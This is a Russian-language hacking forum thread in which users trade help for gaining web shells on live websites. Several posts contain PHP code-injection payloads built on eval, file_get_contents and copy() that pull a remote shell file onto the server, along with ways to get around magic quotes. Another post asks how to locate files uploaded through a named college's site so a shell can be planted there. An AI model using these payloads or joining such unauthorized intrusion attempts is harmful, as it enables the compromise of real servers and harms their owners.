22.03.2013, 00:04
|
|
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726
Репутация:
0
|
|
Затерялся, похоже, мой вопрос в этой гуще.
Сообщение от rogatiy
Господа, новая задача:
Код:
PHP 5.2.6-1+LENNY16
allow_url_fopen On
allow_url_include Off
file_uploads On
magic_quotes_gpc On
magic_quotes_runtime Off
magic_quotes_sybase Off
cURL On
Дыра всё та же - PHP inj в URL. /search?name={${eval(stripslashes($_GET[cmd]))}}&cmd=phpinfo(); не пашет, name={${eval(stripslahes(file_get_contents($_COOKI E[shell])))}}, где содержание печеньки "shell" = 'линк на шелл', тоже, точнее срабатывают MQ, кавычки экранируются и запрос ломается. Идеи? |
|
|
22.03.2013, 07:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от rogatiy
Затерялся, похоже, мой вопрос в этой гуще.
кавычки в eval можно обойти такой конструкцией:
copy($_POST[a],$_POST )&a=http://site/shell.txt&b=shell.php
|
|
|
|
22.03.2013, 08:55
|
|
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726
Репутация:
0
|
|
Warning: copy() [function.copy]: Unable to access in /hosting/htdocs/as/kernel/insert.inc.php(570) : eval()'d code on line 1
Недостаточно прав? Давайте тогда уж рассматривать ситуацию с file_get_contents, там хоть более менее знакомо всё, хоть конфиги почитать получится. name={${eval(stripslashes(file_get_contents($_POST[ev])))}}&ev=http://site/shell.txt не проходит, код шелла без , то есть всё, вроде, кошерно
|
|
|
|
22.03.2013, 13:56
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Сообщение от qaz
они в БД лежат а не в папке
Эт понятно, но любая база данных представляет собой набор файлов, расположенных в определенной директории. Из вашего утверждения следует, что на основании предоставленных мной данных невозможно узнать расположение файлов базы данных и их имена? Какую еще информацию нужно для этого получить?
Спасибо
|
|
|
|
22.03.2013, 14:49
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
rogatiy
А не проще, выложить УРЛ или отписать кому-то в ПМ, что бы помогли, а не играть тут в игру "сделайте, то не зная, что где и как" на 5 страниц темы! т.к. того, что Вы предоставили может не хватать и что бы узнать, что конкретно не дает Вам добиться полноценного шелла на сайте, зачем людей заставлять играть в угадайку: "а может так, получиться, а так не пробовали..."
|
|
|
|
23.03.2013, 08:05
|
|
Новичок
Регистрация: 20.03.2013
Сообщений: 2
С нами:
6920246
Репутация:
0
|
|
Здравствуйте. В поисках уязвимостей на сайте учебного заведения наткнулся на вот такой баг. _http://www.sibcol.ru/system/download/ Как я понял с помощью этого даонлодэра можно залить шелл. Вопрос в том куда в итоге попадают загруженные файлы? В корне и в этой самой дирректории залитые файлы не находятся.
|
|
|
|
23.03.2013, 12:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от NECHISTb
Здравствуйте. В поисках уязвимостей на сайте учебного заведения наткнулся на вот такой баг. _http://www.sibcol.ru/system/download/ Как я понял с помощью этого даонлодэра можно залить шелл. Вопрос в том куда в итоге попадают загруженные файлы? В корне и в этой самой дирректории залитые файлы не находятся.
Игра есть такая. "Прятки" называется. Вот когда ты находишь подобную форму для аплоада - ты невольно подписываешься на её участие. И каждый раз итоговая папка может быть спрятана хз где...
З.Ы. У тебя кроме раскрытия путей, вроде бы, ничего полезного сделать нельзя.
|
|
|
|
23.03.2013, 14:29
|
|
Новичок
Регистрация: 20.03.2013
Сообщений: 2
С нами:
6920246
Репутация:
0
|
|
Сообщение от BigBear
Игра есть такая. "Прятки" называется. Вот когда ты находишь подобную форму для аплоада - ты невольно подписываешься на её участие. И каждый раз итоговая папка может быть спрятана хз где...
З.Ы. У тебя кроме раскрытия путей, вроде бы, ничего полезного сделать нельзя.
Дело в том что и на закрытые страницы которые указаны в robots.txt по адресу _http://www.sibcol.ru/system/sophos/IDES/
я не могу попасть... Есть ли способ отследить загрузку файла?
|
|
|
|
23.03.2013, 14:53
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от NECHISTb
Дело в том что и на закрытые страницы которые указаны в robots.txt по адресу _http://www.sibcol.ru/system/sophos/IDES/
я не могу попасть... Есть ли способ отследить загрузку файла?
какую загрузку?? таф функция file_get_contents ты моксимум чо сможешь сделать это профитать исходники файлов на сервере
|
|
|
|
23.03.2013, 17:01
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
del/
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
